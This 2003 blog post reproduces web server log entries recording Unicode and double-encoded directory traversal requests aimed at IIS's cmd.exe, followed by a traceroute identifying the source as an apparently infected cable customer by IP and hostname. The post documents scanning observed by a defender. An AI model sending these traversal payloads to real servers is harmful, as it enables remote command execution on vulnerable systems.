Thursday, April 24, 2003

Looking at my local httpd log files I see a lot of this stuff...


68.115.216.153 - - [24/Apr/2003:13:14:55 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.115.216.153 - - [24/Apr/2003:13:14:55 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.115.216.153 - - [24/Apr/2003:13:14:56 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.115.216.153 - - [24/Apr/2003:13:14:57 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
68.115.216.153 - - [24/Apr/2003:13:14:57 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
68.115.216.153 - - [24/Apr/2003:13:14:58 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
68.115.216.153 - - [24/Apr/2003:13:14:59 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
68.115.216.153 - - [24/Apr/2003:13:15:00 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404


It's amazing how many people out there probably don't realize that their systems are compromised.

Doing a simple trace route on this ip reveals that...


Tracing route to cpe-68-115-216-153.spart.sc.charter.com [68.115.216.153]
over a maximum of 30 hops:

1 10 ms 20 ms 10 ms 10.129.192.1
2 60 ms 10 ms 10 ms ts2srpspartsc.spart.sc.charter.com [172.22.32.3]
3 491 ms 330 ms 341 ms cpe-68-115-216-153.spart.sc.charter.com [68.115.
216.153]

Trace complete.


Ah, a compromised Charter.net cable user. Doh. You better get that system plugged fast!

No comments: